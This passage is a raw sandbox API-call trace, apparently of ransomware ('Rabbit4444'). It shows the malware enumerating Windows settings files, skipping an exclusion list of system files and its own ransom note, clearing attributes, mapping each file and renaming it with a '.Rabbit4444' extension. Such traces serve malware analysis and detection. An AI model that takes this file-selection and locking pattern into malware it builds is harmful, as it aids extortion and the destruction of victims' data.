(lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.683] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.683] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms") returned="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms" [0056.683] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.683] lstrlenW (lpString="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms") returned 56 [0056.683] lstrlenW (lpString="Rabbit4444") returned 10 [0056.683] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.683] lstrlenW (lpString=".dll") returned 4 [0056.683] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.683] lstrlenW (lpString=".lnk") returned 4 [0056.683] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.683] lstrlenW (lpString=".ini") returned 4 [0056.683] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.683] lstrlenW (lpString=".sys") returned 4 [0056.683] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevicesettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.684] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.684] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14799434560) returned 1 [0056.684] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1117) returned 1 [0056.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.684] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.685] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.686] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14799681105) returned 1 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.686] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.686] CloseHandle (hObject=0x298) returned 1 [0056.686] CloseHandle (hObject=0x278) returned 1 [0056.686] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms.Rabbit4444") returned 184 [0056.686] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevicesettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevicesettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.687] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b99503, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7b99503, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", cAlternateFileName="AA6364~2.SET")) returned 1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2=".") returned 1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="..") returned 1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="windows") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="boot") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.687] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.687] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemDisplay.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemDisplay.settingcontent-ms") returned="AAA_SettingsPagePCSystemDisplay.settingcontent-ms" [0056.687] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.688] lstrlenW (lpString="AAA_SettingsPagePCSystemDisplay.settingcontent-ms") returned 49 [0056.688] lstrlenW (lpString="Rabbit4444") returned 10 [0056.688] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.688] lstrlenW (lpString=".dll") returned 4 [0056.688] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.688] lstrlenW (lpString=".lnk") returned 4 [0056.688] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.688] lstrlenW (lpString=".ini") returned 4 [0056.688] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.688] lstrlenW (lpString=".sys") returned 4 [0056.688] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdisplay.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.688] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.688] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14799907243) returned 1 [0056.688] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.688] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.692] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.693] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14800422436) returned 1 [0056.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.694] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.694] CloseHandle (hObject=0x298) returned 1 [0056.694] CloseHandle (hObject=0x278) returned 1 [0056.694] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms.Rabbit4444") returned 177 [0056.694] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdisplay.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdisplay.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.695] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d63123, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7d63123, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemInfo.settingcontent-ms", cAlternateFileName="AA018C~1.SET")) returned 1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2=".") returned 1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="..") returned 1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="windows") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="boot") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.695] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.695] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemInfo.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemInfo.settingcontent-ms") returned="AAA_SettingsPagePCSystemInfo.settingcontent-ms" [0056.695] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.695] lstrlenW (lpString="AAA_SettingsPagePCSystemInfo.settingcontent-ms") returned 46 [0056.695] lstrlenW (lpString="Rabbit4444") returned 10 [0056.695] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.695] lstrlenW (lpString=".dll") returned 4 [0056.695] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.695] lstrlenW (lpString=".lnk") returned 4 [0056.695] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.695] lstrlenW (lpString=".ini") returned 4 [0056.695] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.695] lstrlenW (lpString=".sys") returned 4 [0056.695] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.695] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsysteminfo.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.696] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.696] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14800647307) returned 1 [0056.696] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0056.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.696] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.697] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14800894889) returned 1 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0056.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.698] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.699] CloseHandle (hObject=0x298) returned 1 [0056.699] CloseHandle (hObject=0x278) returned 1 [0056.699] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms.Rabbit4444") returned 174 [0056.699] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsysteminfo.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemInfo.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsysteminfo.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.699] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b8b0c0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x8b8b0c0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", cAlternateFileName="AA5C62~1.SET")) returned 1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2=".") returned 1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="..") returned 1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="windows") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="boot") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.705] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.705] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemShellMode.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemShellMode.settingcontent-ms") returned="AAA_SettingsPagePCSystemShellMode.settingcontent-ms" [0056.705] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.706] lstrlenW (lpString="AAA_SettingsPagePCSystemShellMode.settingcontent-ms") returned 51 [0056.706] lstrlenW (lpString="Rabbit4444") returned 10 [0056.706] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.706] lstrlenW (lpString=".dll") returned 4 [0056.706] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.706] lstrlenW (lpString=".lnk") returned 4 [0056.706] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.706] lstrlenW (lpString=".ini") returned 4 [0056.706] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.706] lstrlenW (lpString=".sys") returned 4 [0056.706] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.706] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemshellmode.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.706] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.706] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14801689425) returned 1 [0056.706] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.706] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.753] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.754] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14806486227) returned 1 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.754] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.754] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.754] CloseHandle (hObject=0x298) returned 1 [0056.754] CloseHandle (hObject=0x278) returned 1 [0056.754] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms.Rabbit4444") returned 179 [0056.755] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemshellmode.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemShellMode.settingcontent-ms.Rabbit4444" (normalized: 